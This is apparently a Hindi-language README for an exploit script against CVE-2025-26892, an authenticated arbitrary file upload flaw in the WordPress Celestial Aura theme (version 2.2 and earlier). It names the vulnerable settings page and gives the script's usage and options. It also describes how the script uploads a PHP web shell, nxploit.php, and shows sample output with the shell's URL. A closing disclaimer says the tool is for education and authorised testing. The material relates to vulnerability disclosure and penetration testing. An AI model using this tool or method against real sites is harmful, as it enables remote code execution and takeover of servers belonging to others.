
WordPress Celestial Aura थीम <= 2.2 मनमानी फ़ाइल अपलोड (Arbitrary File Upload) के लिए संवेदनशील है।
WordPress Celestial Aura थीम (जिसे dkszone द्वारा विकसित किया गया है) के संस्करण 2.2 तक एक अप्रतिबंधित फ़ाइल अपलोड भेद्यता मौजूद है।
एक निम्न-विशेषाधिकार प्राप्त प्रमाणित उपयोगकर्ता थीम के एडमिन पैनल के माध्यम से मनमानी PHP फ़ाइलें अपलोड कर सकता है, जिससे संभावित रूप से रिमोट कोड निष्पादन (RCE) हो सकता है।
Celestial Aurawp-admin/admin.php?page=CA-settingsPatchstack CNA रेटिंग:
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:Husage: CVE-2025-26892.py [-h] --url URL --username USERNAME --password PASSWORD
CVE-2025-26892 | WordPress Celestial Aura Theme <= 2.2 Arbitrary File Upload (Authenticated)
options:
-h, --help Show this help message and exit
--url, -u URL Target WordPress site (e.g., http://127.0.0.1/wordpress)
--username, -un WordPress username (any authenticated user)
--password, -p WordPress password
स्क्रिप्ट प्रदान किए गए क्रेडेंशियल्स से लॉग इन करती है, भेद्य थीम सेटिंग्स के माध्यम से एक दुर्भावनापूर्ण PHP शेल (nxploit.php) अपलोड करती है, और अपलोड किए गए शेल का सीधा URL प्रिंट करती है।
[+] Exploit sent successfully.
[+] Form Fields Sent:
- CA_hdrimage: yes
...
- CA_save: Save changes
[+] Shell Location:
http://target-site/wp-content/uploads/nxploit.php
Exploit By: Khaled_alenazi (Nxploited)
यह प्रोजेक्ट केवल शैक्षिक और अधिकृत पैठ परीक्षण उद्देश्यों के लिए है।
इस टूल के किसी भी दुरुपयोग की ज़िम्मेदारी लेखक की नहीं है।